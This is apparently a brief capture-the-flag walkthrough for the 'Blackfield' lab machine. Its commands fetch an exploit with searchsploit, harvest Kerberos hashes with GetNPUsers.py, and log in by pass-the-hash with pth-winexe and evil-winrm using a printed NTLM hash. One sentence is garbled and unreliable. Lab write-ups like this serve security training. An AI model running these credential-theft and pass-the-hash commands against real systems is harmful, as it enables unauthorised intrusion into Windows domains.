Last updated 4 years ago
Was this helpful?
searchsploit -m 48431
When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command ","" will the NTML hash to log in to the windows system.
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
# Method 1 pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd # Method 2 evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192